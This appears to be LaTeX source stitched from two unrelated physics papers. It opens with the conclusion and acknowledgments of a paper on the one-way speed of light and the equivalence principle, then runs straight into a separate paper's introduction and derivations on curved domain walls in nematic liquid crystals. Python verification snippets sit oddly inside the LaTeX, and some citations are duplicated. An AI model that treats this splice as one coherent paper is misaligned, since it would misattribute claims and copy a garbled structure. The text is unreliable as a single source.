In conclusion, isotropy in the one-way velocity of light is a matter of
definition.
However,
the experiments quoted at the beginning, in particular those
performed by J. Hall and coworkers at a very
sophisticated level, cannot be considered
simply as significant improvements of
classical special relativity tests.
As discussed in the introduction,
this would surely be the case
if the quoted experiments had been performed in a region where
gravity effects are compensated. But the presence of an anisotropic
background radiation, when interpreted as testimony of an
analogous anisotropic mass distribution, and the fact that these
experiments find their explanation in the framework of special
relativity, strongly support the equivalence principle.
We therefore strongly suggest that the
accurate results of such experiments
should be considered significant tests of both special relativity
and the equivalence principle.
\section{Acknowledgments}
Thanks are due to professors John L. Hall and Giuseppe Marmo for useful
discussions; we are also indebted to G. Marmo and G. Esposito for a
critical reading of the manuscript. Thanks are also due to an anonymous
referee who has helped in improving the presentation of the paper.
\section{Introduction}
Liquid crystals are probably the best materials for experimental and
theoretical studies of topological defects. The variety of defects,
the relatively simple experiments in which one can observe them, and the
soundness of theoretical models of the dynamics of the relevant order
parameters make liquid crystals unique in this respect. The literature on
topological defects in liquid crystals is enormous, therefore we do not
attempt to review it here. Let us only point to the books \cite{1},
\cite{2}, \cite{3}, in which
one can find lucid introductions to the topic as well as collections of
references.
Our paper is devoted to dynamics of domain walls in uniaxial nematic liquid
crystals in an external magnetic field. Static, planar domain walls were
discussed for the first time in \cite{5}. We would like to
calculate approximately the director field of a curved domain wall. We use a
method, called the improved expansion in width, whose general theoretical
formulation has been given in \cite{5, 6}. An appropriately adapted
expansion in width can also be applied to disclination lines \cite{7}.
The expansion in width is based on the idea
that transverse profiles of the curved domain wall and of a planar one
differ from each other by small corrections which are due to
curvature of the domain wall. We calculate these corrections perturbatively.
Formally, we expand the director field in a
parameter which gives the width of the domain wall, that is the magnetic
coherence length $\xi_m$ in the case at hand, but actually terms in the
expansion involve dimensionless ratios $\xi_m/R_i$, where $R_i$ are (local)
curvature radii of the domain wall. Therefore, our expansion is expected to
provide a good approximation when the curvature radii of the domain wall are
much larger than the magnetic coherence length.
For planar domain walls the perturbative
solution reduces to just one term which coincides with a well-known exact
solution. As we shall see below, the improved expansion in width is not
quite straightforward -- there are consistency conditions and a rather special
coordinate system is used -- but that should be regarded as a reflection
of the nontriviality of the evolution of curved domain walls.
Actually, the first several terms in the expansion can be calculated without any
difficulty, and the whole approach looks quite promising.
In the present paper we consider the simplest and rather elegant
case of equal elastic constants.
In order to take into account differences of values of the elastic
constants for real liquid crystals one can use, for example, the following
two strategies: perturbative expansion with respect to
deviations of the elastic constants from their mean
value, or the expansion in width generalized to the unequal constants case.
In the former approach, the equal constant approximate solution obtained in
the present paper can be used as the starting point for calculating
corrections. The case of unequal elastic constants will be discussed in a
subsequent paper.
The plan of our paper is as follows. We begin with general description
of domain walls in uniaxial nematic liquid crystals in Section 2. Next,
in Section 3, we introduce a special coordinate system comoving with the
domain wall. Section 4 contains description of the improved expansion in
width. In Section 5 we discuss consecutive terms in the expansion up to
the second order in $\xi_m$. Several remarks related to our work are
collected in Section 6.
\section{ Domain walls in nematic liquid crystals }
In this Section we recall basic facts about domain walls in uniaxial nematic
liquid crystals \cite{1}, \cite{2}. We fix our notation and sketch the background
for the calculations presented in the next two Sections.
We shall parametrize the director field $\vec{n}(\vec{x},t)$ by two angles
$\Theta(\vec{x},t)$, $\Phi(\vec{x},t)$:
\begin{equation}
\vec{n} = \left(
\begin{array}{c}
\sin\Theta \cos\Phi \\ \sin\Theta \sin\Phi \\ \cos\Theta
\end{array}
\right).
\end{equation}
In this way we get rid of the constraint $\vec{n}^2 = 1.$
We assume that the splay, twist and bend elastic constants are equal
($K_{11} = K_{22} = K_{33} = K$). In this case Frank---Oseen---Z\"ocher
elastic free energy density can be written in the form
\begin{equation}
{\cal F}_e = \frac{K}{2} (\partial_{\alpha}\Theta \partial_{\alpha}\Theta
+ \sin^2\Theta \partial_{\alpha}\Phi \partial_{\alpha}\Phi ).
\end{equation}
Our notation is as follows: $\alpha=1,2,3$; $\;\partial_{\alpha} =
\partial / \partial x^{\alpha}$; $\;x^{\alpha} $
are Cartesian coordinates in the usual 3-dimensional space $R^3$;
$\;\vec{x} = (x^{\alpha})$. In formula (2) we have omitted a surface
term which is irrelevant for our considerations.
In order to have stable domain walls it is necessary to apply an external
magnetic field $\vec{H}_0$ \cite{1}, \cite{2}.
We assume that $\vec{H}_0$ is constant in space and time. Without any loss
in generality we may take
\[ \vec{H}_0 = \left(
\begin{array}{c}
0 \\ 0 \\ H_0
\end{array}
\right).
\]
Then the magnetic field contribution to free energy density of the nematic
is given by the following formula
\begin{equation}
{\cal F}_m = - \frac{1}{2} \chi_a H_0^2 \cos^2\Theta.
\end{equation}
Here $\chi_a$ is the anisotropy of the magnetic susceptibility. It can be
either positive or negative. For concreteness, we shall assume that
$\chi_a > 0.$ Our calculations can easily be repeated if $\chi_a < 0.$
The ground state of the nematic is double degenerate: $\Theta = 0$
and $\Theta = \pi$ give minimal total free energy density
$ {\cal F} = {\cal F}_e + {\cal F}_m. $
It is due to this degeneracy that stable domain walls can exist.
Dynamics of the director field is mathematically described by the equation
\begin{equation}
\gamma_1 \frac{\partial \vec{n}}{\partial t} + \frac{\delta F}{\delta
\vec{n}} = 0,
\end{equation}
where
\[ F = \int d^3x {\cal F}. \]
$\gamma_1$ is the rotational viscosity of the liquid crystal, and
$\delta/\delta\vec{n}$ denotes the variational derivative with respect to
$\vec{n}$. Equation (4)
is equivalent to the following equations for the $\Theta$ and $\Phi$ angles
\begin{equation}
\gamma_1 \frac{\partial \Theta}{\partial t} =
K \Delta \Theta - \frac{K}{2} \sin(2\Theta) \partial_{\alpha}\Phi
\partial_{\alpha}\Phi - \frac{1}{2} \chi_a H_0^2 \sin(2\Theta),
\end{equation}
\begin{equation}
\gamma_1 \sin^2\Theta \frac{\partial \Phi}{\partial t} =
K \partial_{\alpha}(\sin^2\Theta \partial_{\alpha} \Phi),
\end{equation}
where $\Delta = \partial_{\alpha}\partial_{\alpha}$.
The domain walls arise when the director field is parallel to the
magnetic field $\vec{H}_0$ in one part of the space and anti-parallel to it
in another. In between there is a layer -- the domain wall -- across which
$\vec{n}$ smoothly changes its orientation from parallel to $\vec{H}_0$
to the opposite one, that is $\Theta$ varies from 0 to $\pi$ or vice versa.
The angle $\Phi$ does not play an important role. The Ansatz
\begin{equation}
\Phi = \Phi_0
\end{equation}
with constant $\Phi_0$ trivially solves Eq.(6). Then, Eq.(5) is the only
equation we have to solve. In the following we
assume the Ansatz (7), hereby restricting the class of domain walls we
consider. It is clear from formula (2) that domain walls with varying
$\Phi$ have higher elastic free energy than the walls with constant $\Phi$.
Let us recall the static planar domain wall \cite{1, 2}. We assume that it
is parallel to the $x^1 = 0$ plane. Then
\begin{equation}
\Theta = \Theta_0(x^1), \;\; \Phi_0 = \mbox{const},
\end{equation}
where
\begin{equation}
\Theta_0 \left.\right|_{x^1 \rightarrow -\infty} = 0, \;\;
\Theta_0 \left.\right|_{x^1 \rightarrow +\infty} = \pi.
\end{equation}
One could also consider an ``anti-domain wall'' obtained by interchanging 0 and
$\pi$ on the r.h.s. of boundary conditions (9). Equation (5) is now reduced
to the following equation
\begin{equation}
K \Theta_0^{''} = \frac{1}{2} \chi_a H_0^2 \sin(2\Theta_0),
\end{equation}
where ' denotes $d/dx^1$. This equation is well-known in soliton theory
as the sine-Gordon equation, see e.g., \cite{8}.
It is convenient to introduce the magnetic coherence length $\xi_m$,
\begin{equation}
\xi_m =\left( K/ \chi_a H^2_0\right)^{1/2}.
\end{equation}
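For orientation, a rough estimate of $\xi_m$ can be obtained with typical CGS material constants; the values below are illustrative only and are not taken from the text:

```python
import math

K = 1.0e-6       # elastic constant, dyn (typical nematic value)
chi_a = 1.0e-7   # anisotropy of the magnetic susceptibility (CGS, dimensionless)
H0 = 1.0e4       # magnetic field in gauss (= 1 tesla)

xi_m = math.sqrt(K / (chi_a * H0**2))           # Eq.(11), result in cm
print(f"xi_m = {xi_m * 1e4:.1f} micrometers")   # ~3 micrometers
```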
The functions
\begin{equation}
\Theta_0(x^1) = 2 \arctan(\exp \frac{x^1 - x^1_0}{\xi_m})
\end{equation}
with arbitrary constant $x^1_0$ obey Eq.(10) as well as the boundary
conditions (9). The planar domain walls are homogeneous in the $x^1=0$
plane. Their transverse profile is parametrized by $x^1$. Width of the wall
is approximately equal to $\xi_m$, in the sense that for $|x^1 - x^1_0| \gg
\xi_m$ values of $\Theta_0$ differ from 0 or $\pi$ by exponentially small
terms.
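That the profile (12) satisfies Eq.(10) and the boundary conditions (9) can be checked numerically; the sketch below works in units of $\xi_m$ and verifies $\xi_m^2\Theta_0''=\frac{1}{2}\sin(2\Theta_0)$ by finite differences:

```python
import numpy as np

xi_m, x0 = 1.0, 0.0                 # work in units of the coherence length
theta = lambda x: 2.0 * np.arctan(np.exp((x - x0) / xi_m))

x = np.linspace(-5.0, 5.0, 2001)
h = x[1] - x[0]
th = theta(x)
lhs = xi_m**2 * (th[2:] - 2.0 * th[1:-1] + th[:-2]) / h**2   # Theta_0''
rhs = 0.5 * np.sin(2.0 * th[1:-1])                           # r.h.s. of Eq.(10)
assert np.max(np.abs(lhs - rhs)) < 1e-4

# boundary conditions (9): Theta_0 -> 0 on the left, pi on the right
assert theta(-50.0) < 1e-6 and abs(theta(50.0) - np.pi) < 1e-6
```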
The planar domain wall solution of Eqs.(5), (6) contains two arbitrary
constants: $\Phi_0$ and $x^1_0$. The arbitrariness of $\Phi_0$ is due to the
assumption that the elastic constants are equal. Then the free energy density
${\cal F}$ is invariant with respect to $\Phi \rightarrow \Phi +
\mbox{const}$. If the elastic constants are not equal this invariance is
lost, and in the case of planar domain walls $\Phi_0$ can
take only discrete values $n \pi/2, n=0,1,2,3.$
The constant $x^1_0$ appears because of invariance of Eqs.(5), (6)
with respect to the translations $x^1 \rightarrow x^1 + \mbox{const}$.
Notice that $\Theta_0(x^1_0) = \pi/2$. Hence at $x^1 = x^1_0$ the director
$\vec{n}$ is perpendicular to $\vec{H}_0$. In fact, the boundary conditions
(9) imply that for any domain wall there is a surface on which
$\vec{n}\vec{H}_0 =0$. Such a surface is called the core of the domain wall.
The magnetic free energy density ${\cal F}_m$ has a maximum on the core.
The planar domain wall (12) plays a very important role in our approach. In a
sense, it is taken as the zeroth order approximation to curved domain walls.
The trick consists in using a special coordinate system comoving with the
curved domain wall. Such a coordinate system encodes shape and motion of
the domain wall regarded as a surface in the space. Internal dynamics of
the domain wall, like details of orientation of the director inside the
domain wall, is then calculated perturbatively in the comoving reference
frame with the function (12) taken as the leading term.
\section{The comoving coordinates}
The first step in our construction of the perturbative solution consists
in introducing the coordinates comoving with the domain wall.
Two coordinates ($\sigma^1,\; \sigma^2$) parametrize the domain wall
regarded as a surface in the $R^3$ space, and one coordinate, let us say $\xi$,
parametrizes the direction perpendicular to the domain wall. For convenience
of the reader we quote the main definitions and formulas below \cite{6}.
We introduce a smooth, closed or infinite surface $S$ in the usual $R^3$
space. It is supposed to lie close to the domain wall. Its shape mimics
the shape of the domain wall. In particular we may assume that
$S$ coincides with the core at a certain time $t_0$.
Points of $S$ are given by $\vec{X}(\sigma^i,t)$, where $\sigma^i$ $(i=1,2)$
are two intrinsic coordinates on $S$, and $t$ denotes the time. We
allow for motion of $S$ in the space. The vectors $\vec{X}_{,k},\; k=1,2$,
are tangent to $S$ at the point $\vec{X}(\sigma^i,t)$ \footnote{We use the
notation $f_{,k} \equiv \partial f / \partial\sigma^k$.}. They are
linearly independent, but not necessarily orthogonal to each other. At each
point of $S$ we also introduce a unit vector
$\vec{p}(\sigma^i,t)$ perpendicular to $S$, that is
\[ \vec{p} \vec{X}_{,k} =0,\;\;\; \vec{p}^2 =1. \]
The triad $(\vec{X}_{,k}, \vec{p})$ forms a local basis at the point
$\vec{X}$ of $S$. Geometrically, $S$ is characterized by the
induced metric tensor on $S$
\[ g_{ik} = \vec{X}_{,i} \vec{X}_{,k}, \]
and by the extrinsic curvature coefficients of $S$
\[ K_{il} = \vec{p}\vec{X}_{,il}, \]
where $i,k,l=1,2$. They appear in Gauss-Weingarten formulas
\begin{equation}
\vec{X}_{,ij} = K_{ij} \vec{p} + \Gamma^l_{ij} \vec{X}_{,l}, \;\;\;\;
\vec{p}_{,i} = - g^{jl} K_{li} \vec{X}_{,j}.
\end{equation}
The matrix $(g^{ik})$ is by definition the inverse of the matrix
$(g_{kl})$, i.e.
$g^{ik}g_{kl}= \delta^i_l$, and $\Gamma^l_{ik}$ are Christoffel symbols
constructed from the metric tensor $g_{ik}$. Two eigenvalues $k_1,k_2$ of
the matrix $(K^i_j)$, where $K^i_j = g^{il}K_{lj}$, are called extrinsic
curvatures of $S$ at the point $\vec{X}$. The main curvature radii are
defined as $R_i =1/k_i$.
The comoving coordinates $(\sigma^1, \sigma^2,\xi)$ are introduced by the
following formula
\begin{equation}
\vec{x} = \vec{X}(\sigma^i,t) + \xi \vec{p}(\sigma^i,t).
\end{equation}
$\xi$ is the coordinate in the direction perpendicular to the surface $S$.
In the comoving coordinates this surface has a very simple equation: $\xi = 0.$
We will use the compact notation:
$(\sigma^1, \sigma^2, \xi) = (\sigma^{\alpha})$, where $\alpha$=1, 2, 3
and $\sigma^3 = \xi$. The coordinates $(\sigma^{\alpha})$ are just a special
case of curvilinear coordinates in the space $R^3$. In these coordinates the
metric tensor $(G_{\alpha \beta})$ in $R^3$ has the following components:
\[ G_{33} =1, \;\; G_{3k} = G_{k3} =0, \;\; G_{ik} = N^l_i g_{lr}N^r_k, \]
where
\[ N^l_i = \delta^l_i - \xi K^l_i, \]
$i,k,l,r =1,2$. Simple calculations give
\[ \sqrt{G} =\sqrt{g} N, \]
where $G=\det(G_{\alpha\beta}),
\;\; g=\det(g_{ik})$ and $N=\det(N^l_i).$ For $N$ we obtain the
following formula
\[ N = 1 - \xi K^i_i + \frac{1}{2} \xi^2 (K_i^i K^l_l - K^i_lK^l_i). \]
Components $G^{\alpha \beta}$ of the inverse metric tensor in $R^3$ have
the form
\[ G^{33} =1,\;\; G^{3k}=G^{k3}=0, \;\; G^{ik}= (N^{-1})^i_r g^{rl}
(N^{-1})^k_l, \]
where
\[ (N^{-1})^i_r = \frac{1}{N}
\left((1-\xi K^l_l) \delta^i_r + \xi K^i_r \right). \]
We see that the dependence on the transverse coordinate
$\xi$ is explicit, while $\sigma^1, \sigma^2$ appear through the tensors
$g_{ik}, \; K^l_r$ which characterize the surface $S$.
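These $2\times2$ determinant and inverse formulas can be checked directly; the short sketch below (an illustrative aside with hypothetical numerical values, not part of the original derivation) compares the expansions above with explicit matrix algebra:

```python
# Illustrative check, with hypothetical numerical values, of the 2x2
# formulas N = det(delta - xi K) = 1 - xi tr K + (xi^2/2)[(tr K)^2 - tr K^2]
# and (N^{-1})^i_r = [(1 - xi tr K) delta^i_r + xi K^i_r] / N.
def check(K, xi):
    (a, b), (c, d) = K
    trK = a + d
    trK2 = a*a + 2*b*c + d*d                      # tr(K^2) for a 2x2 matrix
    N_series = 1 - xi*trK + 0.5*xi*xi*(trK*trK - trK2)
    M = [[1 - xi*a, -xi*b], [-xi*c, 1 - xi*d]]    # N^l_i = delta^l_i - xi K^l_i
    N_direct = M[0][0]*M[1][1] - M[0][1]*M[1][0]
    inv = [[(1 - xi*trK + xi*a)/N_direct, xi*b/N_direct],
           [xi*c/N_direct, (1 - xi*trK + xi*d)/N_direct]]
    prod = [[sum(M[i][k]*inv[k][j] for k in range(2)) for j in range(2)]
            for i in range(2)]                    # should be the identity
    return N_series, N_direct, prod

N_series, N_direct, prod = check([[0.3, 0.1], [0.2, -0.4]], 0.7)
```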
The comoving coordinates $(\sigma^{\alpha})$ have, in general, a finite
region of validity. In particular, the range of $\xi$ is given by the smallest
positive $\xi_0(\sigma^i,t)$ for which $G = 0$. It is clear that such $\xi_0$
increases with decreasing extrinsic curvature coefficients $K_i^l$, reaching
infinity for the planar domain wall, for which $K_j^i = 0$. We assume that
the surface $S$ (hence also the domain wall) is not curved too much. Then
that region is large enough that outside it only the exponentially small
tails of the domain wall remain, and these give negligible contributions to
its physical characteristics.
The comoving coordinates are utilised to write Eq.(5) in a form suitable
for calculating the curvature corrections. Let us start from the Laplacian
$\Delta\Theta$. In the new coordinates it has the form
\[
\Delta\Theta = \frac{1}{\sqrt{G}} \frac{\partial}{\partial\sigma^{\alpha}}
\left(\sqrt{G} G^{\alpha\beta}\frac{\partial\Theta}{\partial \sigma^{\beta}}
\right).
\]
The time derivative on the l.h.s. of Eq.(5) is taken under the condition
that all $x^{\alpha}$ are constant. It is convenient to use the time
derivative taken at constant $\sigma^{\alpha}$. The two derivatives are related by
the formula
\[
\frac{\partial}{\partial t}|_{x^{\alpha}} =
\frac{\partial}{\partial t}|_{\sigma^{\alpha}} +
\frac{\partial \sigma^{\beta}}{\partial t}|_{x^{\alpha}}
\frac{\partial}{\partial \sigma^{\beta}},
\]
where
\[ \frac{\partial \xi}{\partial t}|_{x^{\alpha}}
= - \vec{p}\dot{\vec{X}}, \;\;\;
\frac{\partial \sigma^i}{\partial t}|_{x^{\alpha}} = - (N^{-1})^i_k
g^{kr} \vec{X}_{,r} (\dot{\vec{X}} + \xi \dot{\vec{p}}),
\]
and the dots stand for $\partial /\partial t |_{\sigma^i}$.
Let us also introduce the dimensionless coordinate
\[ s = \xi / \xi_m. \]
Now we can write equation (5) transformed to the comoving coordinates
$(\sigma^i, s)$ (with the Ansatz (7) taken into account):
\[
\frac{\gamma_1}{K} \xi_m^2
\left( \frac{\partial \Theta}{\partial t}|_{\sigma^{\alpha}}
- \frac{1}{\xi_m}\vec{p}\dot{\vec{X}} \frac{\partial\Theta}{\partial s}
- (N^{-1})^i_k g^{kr} \vec{X}_{,r} (\dot{\vec{X}} + \xi_m s
\dot{\vec{p}}) \frac{\partial\Theta}{\partial\sigma^i} \right)
\]
\begin{equation}
= \frac{\partial^2 \Theta}{\partial s^2} -
\frac{1}{2} \sin(2\Theta) + \frac{1}{N} \frac{\partial N}{\partial s}
\frac{\partial \Theta}{\partial s} + \xi_m^2 \frac{1}{\sqrt{g} N}
\frac{\partial}{\partial \sigma^j} \left(G^{jk}\sqrt{g} N
\frac{\partial \Theta}{\partial \sigma^k} \right).
\end{equation}
Equation (15) is the starting point for the construction of the expansion
in width.
\section{The improved expansion in width}
We seek domain wall solutions of Eq.(15) in the form of an expansion with
respect to $\xi_m$, that is
\begin{equation}
\Theta = \Theta_0 + \xi_m \Theta_1 + \xi_m^2 \Theta_2 + ... \;\;\; .
\end{equation}
Inserting formula (16) in Eq.(15) and keeping only terms of the lowest
order ($\sim \xi_m^0$) we obtain the following equation
\begin{equation}
\frac{\partial^2 \Theta_0}{\partial s^2} = \frac{1}{2} \sin(2\Theta_0),
\end{equation}
which essentially coincides with Eq.(10) after the rescaling $x^1 = \xi_m s$.
Its solutions
\[
\Theta_{s_0}(s) = 2 \arctan(\exp(s-s_0)),
\]
essentially have the same form as the planar domain walls (12), but now $s$
gives the distance from the surface $S$. This surface will be determined
later. In the remaining part of the paper we shall consider curvature
corrections to the simplest solution
\begin{equation}
\Theta_0(s) = 2 \arctan(\exp s).
\end{equation}
Because $\Theta_0$ already interpolates between the ground state solutions
$0, \pi$, the corrections $\Theta_k, \; k \geq 1,$ should vanish in the
limits $s \rightarrow \pm \infty$.
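As a quick numerical sanity check (our own illustrative aside), one can verify by finite differences that $\Theta_0(s) = 2\arctan(e^s)$ indeed satisfies Eq.(17), together with the closed-form identities for $\sin(2\Theta_0)$ and $\cos(2\Theta_0)$ used below:

```python
import math

# Finite-difference check (illustrative) that Theta_0(s) = 2 arctan(e^s)
# satisfies Theta'' = (1/2) sin(2 Theta), and of the identities
# sin(2 Theta_0) = -2 sinh s / cosh^2 s,  cos(2 Theta_0) = 1 - 2/cosh^2 s.
def theta0(s):
    return 2.0 * math.atan(math.exp(s))

def ode_residual(s, h=1e-4):
    d2 = (theta0(s + h) - 2.0*theta0(s) + theta0(s - h)) / h**2
    return d2 - 0.5 * math.sin(2.0 * theta0(s))

pts = [k / 10.0 for k in range(-50, 51)]
max_ode = max(abs(ode_residual(s)) for s in pts)
max_sin = max(abs(math.sin(2*theta0(s)) + 2*math.sinh(s)/math.cosh(s)**2)
              for s in pts)
max_cos = max(abs(math.cos(2*theta0(s)) - (1 - 2/math.cosh(s)**2))
              for s in pts)
```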
Equations for the corrections $\Theta_k, \; k\geq1,$ are obtained by
expanding both sides of Eq.(15) and equating terms proportional
to $\xi_m^k$. These equations can be written in the form
\begin{equation}
\hat{L} \Theta_k = f_k,
\end{equation}
with the operator $\hat{L}$
\begin{equation}
\hat{L} = \frac{\partial^2}{\partial s^2} - \cos(2\Theta_0) =
\frac{\partial^2}{\partial s^2} + \frac{2}{\cosh^2 s} -1.
\end{equation}
The last equality in (20) can be obtained, e.g., from Eq.(17):
inserting $\Theta_0$ given by formula (18) on the l.h.s. of
Eq.(17) we find that $ \sin(2 \Theta_0) = - 2 \sinh s/ \cosh^2 s$, and
$\cos(2\Theta_0) = 1 - 2/\cosh^2s. $
The expressions $f_k$ on the r.h.s. of Eqs.(19) depend on the lower order
contributions $\Theta_l, \; l<k$. Straightforward calculations give
\begin{equation}
f_1 = \partial_s\Theta_0 ( K^r_r - \frac{\gamma_1}{K} \vec{p}\dot{\vec{X}}),
\end{equation}
\begin{equation}
f_2 = - \sin(2\Theta_0) \Theta_1^2 + s \partial_s\Theta_0 K^i_j K^j_i
+ \partial_s\Theta_1 ( K^r_r - \frac{\gamma_1}{K} \vec{p}\dot{\vec{X}}),
\end{equation}
\begin{eqnarray}
& f_3 = \frac{\gamma_1}{K} (\partial_t\Theta_1 - g^{kr}\vec{X}_{,r}
\dot{\vec{X}} \partial_k\Theta_1 ) - 2 \sin(2\Theta_0) \Theta_1 \Theta_2
- \frac{2}{3} \cos(2\Theta_0) \Theta_1^3 & \nonumber \\
&+ s \partial_s\Theta_1 K^i_jK^j_i - \frac{1}{2} s^2 \partial_s\Theta_0 K^r_r
\left( (K^i_i)^2 - 3 K^i_jK^j_i\right) & \nonumber \\
& - \frac{1}{\sqrt{g}}\partial_j(\sqrt{g}g^{jk}\partial_k\Theta_1) +
\partial_s\Theta_2 ( K^r_r - \frac{\gamma_1}{K} \vec{p}\dot{\vec{X}}),
\end{eqnarray}
and
\begin{eqnarray}
& f_4 = \frac{\gamma_1}{K} ( \partial_t\Theta_2
- s g^{ik} \dot{\vec{p}}\vec{X}_{,k}\partial_i\Theta_1 )
- \frac{\gamma_1}{K} g^{jk} \vec{X}_{,k}\dot{\vec{X}} (\partial_j\Theta_2 +
s K^i_j\partial_i\Theta_1 ) & \nonumber \\
& - \sin(2\Theta_0) (\Theta_2^2 +2 \Theta_1 \Theta_3 -
\frac{1}{3} \Theta_1^4) - 2 \cos(2\Theta_0) \Theta_1^2 \Theta_2 &
\nonumber \\
& + s \partial_s \Theta_2 K^i_jK^j_i
+ s^3 \partial_s\Theta_0 \left( (K^r_r)^4 + \frac{1}{2} (K^r_sK^s_r)^2
- 2 (K^r_r)^2 K^i_jK^j_i \right) & \nonumber \\
& - \frac{s^2}{2} \partial_s\Theta_1 K^r_r \left(
(K^i_i)^2 - 3 K^i_jK^j_i \right)
- \frac{1}{\sqrt{g}}\partial_j(\sqrt{g}g^{jk}\partial_k\Theta_2)
& \nonumber \\
& -\frac{2s}{\sqrt{g}} \partial_j(\sqrt{g}K^{jk}\partial_k\Theta_1)
+ s g^{jk}(\partial_jK^r_r) \partial_k\Theta_1 + \partial_s\Theta_3
( K^r_r - \frac{\gamma_1}{K} \vec{p}\dot{\vec{X}}),
\end{eqnarray}
where $\partial_t = \partial /\partial t,\;\; \partial_i = \partial /
\partial \sigma^i$. We have taken into account the fact that $\Theta_0$ does
not depend on $\sigma^i$.
Notice that all Eqs.(19) for $\Theta_k$ are linear. The only nonlinear
equation in our perturbative scheme is the zeroth order equation (17).
It is very important to observe that the operator $\hat{L}$ has a zero-mode,
that is, a function $\psi_0(s)$ which vanishes quickly in the limits
$s \rightarrow \pm \infty$, and which obeys the equation
\[
\hat{L} \psi_0 =0.
\]
Inserting $\Theta_{s_0}(s)$ in Eq.(17), differentiating that equation with
respect to $s_0$ and putting $s_0=0$, we obtain the identity
$\hat{L}\psi_0 = 0$, where
\begin{equation}
\psi_0(s) = \frac{1}{\cosh s}.
\end{equation}
The presence of this zero-mode is related to the invariance of Eq.(17)
with respect to translations in $s$; therefore it is often called the
translational zero-mode. Let us multiply both sides of Eqs.(19) by
$\psi_0(s)$ and integrate over $s$. Integration by parts gives
\[
\int^{\infty}_{-\infty} ds \psi_0 \hat{L} \Theta_k =
\int^{\infty}_{-\infty} ds \Theta_k \hat{L} \psi_0 = 0.
\]
Hence, we obtain the consistency (or integrability) conditions
\begin{equation}
\int^{\infty}_{-\infty} ds \psi_0(s) f_k(s) =0,
\end{equation}
where $f_k$ are given by formulas of the type (21) - (24). We shall see in
the next Section that these conditions play a very important role in
determining the curved domain wall solutions.
Using standard methods \cite{9} one can obtain the following formulas for
the solutions $\Theta_k$ of Eqs.(19) which vanish in the limits
$s \rightarrow \pm \infty$:
\begin{equation}
\Theta_k = G[f_k] + C_k(\sigma^i, t) \psi_0(s),
\end{equation}
where
\begin{equation}
G[f_k] = - \psi_0(s) \int^s_0 dx \psi_1(x) f_k(x) + \psi_1(s)
\int^s_{-\infty} dx \psi_0(x) f_k(x).
\end{equation}
Here $\psi_0(s)$ is the zero-mode (25) and
\begin{equation}
\psi_1(s) = \frac{1}{2} (\sinh s + \frac{s}{\cosh s})
\end{equation}
is the other solution of the homogeneous equation
\[
\hat{L} \psi = 0.
\]
The second term on the r.h.s. of formula (27) obeys the homogeneous
equation $\hat{L}\Theta_k =0$. It vanishes when $s \rightarrow \pm \infty$.
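Both homogeneous solutions can be verified numerically; the following sketch (an illustrative aside using finite differences) checks that $\psi_0$ and $\psi_1$ are annihilated by $\hat{L}$ and that their Wronskian is constant:

```python
import math

# Finite-difference check (illustrative) that psi_0 = 1/cosh s and
# psi_1 = (sinh s + s/cosh s)/2 both solve psi'' + (2/cosh^2 s - 1) psi = 0.
def psi0(s):
    return 1.0 / math.cosh(s)

def psi1(s):
    return 0.5 * (math.sinh(s) + s / math.cosh(s))

def L_hat(psi, s, h=1e-4):
    d2 = (psi(s + h) - 2.0*psi(s) + psi(s - h)) / h**2
    return d2 + (2.0 / math.cosh(s)**2 - 1.0) * psi(s)

pts = [k / 10.0 for k in range(-40, 41)]
res0 = max(abs(L_hat(psi0, s)) for s in pts)
res1 = max(abs(L_hat(psi1, s)) for s in pts)

# The Wronskian psi0 psi1' - psi0' psi1 of two independent solutions
# is constant; for this pair it equals 1.
h = 1e-6
W = (psi0(1.3) * (psi1(1.3 + h) - psi1(1.3 - h)) / (2*h)
     - psi1(1.3) * (psi0(1.3 + h) - psi0(1.3 - h)) / (2*h))
```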
The solutions (27) contain as yet arbitrary functions $C_k(\sigma^i, t)$.
Also $\vec{X}(\sigma^i, t)$ giving the comoving surface $S$ has not been
specified. It turns out that conditions (26) are so restrictive that they
essentially fix those functions. The extrinsic curvature coefficients
$K^i_l$ and the metric $g_{ik}$ will follow from $\vec{X}(\sigma^i,t)$.
One might worry that the $G[f_k], \; k\geq 1$, given by formula (28)
do not vanish when $s\rightarrow \pm \infty$, because the second term on
the r.h.s. of formula (28) is proportional to $\psi_1$, which
increases exponentially in the limits $s \rightarrow \pm \infty$.
However, the integrals
\[ \int^s_{-\infty} dx \psi_0 f_k \]
vanish in that limit due to the consistency conditions (26). Moreover,
qualitative analysis of Eq.(15) shows that $f_k \sim
(\mbox{polynomial in}\; s) \times \exp(-|s|)$ for large $|s|$, hence those
integrals behave like $(\mbox{polynomial in}\;s) \times \exp(-2|s|)$ for
large $|s|$ ensuring that all $G[f_k]$ exponentially vanish when
$|s| \rightarrow \infty$.
\section{The approximate domain wall solutions}
In this Section we discuss the approximate solutions obtained with the help
of the perturbative scheme we have just described. We present formulas for
$\Theta_1$ and $\Theta_2$, an equation for $\vec{X}(\sigma^i, t)$ which
determines motion of the surface $S$, as well as equations for the
functions $C_1,\;C_2$.
The zeroth order solution is already known, see formula (18). This allows us
to discuss the consistency condition with $k=1$. Substituting $f_1$ from
formula (21) and noticing that
\[ \partial_s \Theta_0 = \frac{1}{\cosh s} = \psi_0(s) \]
we find that this condition is equivalent to
\begin{equation}
\frac{\gamma_1}{K} \vec{p} \dot{\vec{X}} = K^r_r.
\end{equation}
This condition is in fact the equation for $\vec{X}$. It is of the same
type as the Allen-Cahn equation \cite{10}, but in our approach it governs
the motion of the auxiliary surface $S$.
Let us now turn to the perturbative corrections. After taking into account
the Allen-Cahn equation (30) we have $f_1 =0$. Therefore, the total
first order contribution has the form
\begin{equation}
\Theta_1 = \frac{C_1(\sigma^i,t)}{\cosh s}.
\end{equation}
The second order contribution $\Theta_2$ is calculated from formula (28)
with $f_2$ given by formula (22).
Using the results (30), (31) we obtain the following
formula
\begin{equation}
\Theta_2 = \psi_2(s) C_1^2(\sigma^i,t) + \psi_3(s) K^i_jK^j_i +
\frac{C_2(\sigma^i,t)}{\cosh s},
\end{equation}
where
\[ \psi_2(s) = - \frac{\sinh s}{2\cosh^2s},
\]
\[
\psi_3(s) = \frac{1}{2}s \cosh s - \frac{s}{2\cosh s}
- \psi_1(s) \ln(2\cosh s)
\]
\[
+ \frac{s^2\sinh s}{4\cosh^2s} - \frac{1}{4 \cosh s} \int^s_0 dx
\frac{x^2}{\cosh^2x}.
\]
The integral in $\psi_3(s)$ can easily be evaluated numerically. Due to the
consistency conditions, the functions $C_1, C_2$ in formulas (31), (32) are
not arbitrary, see below.
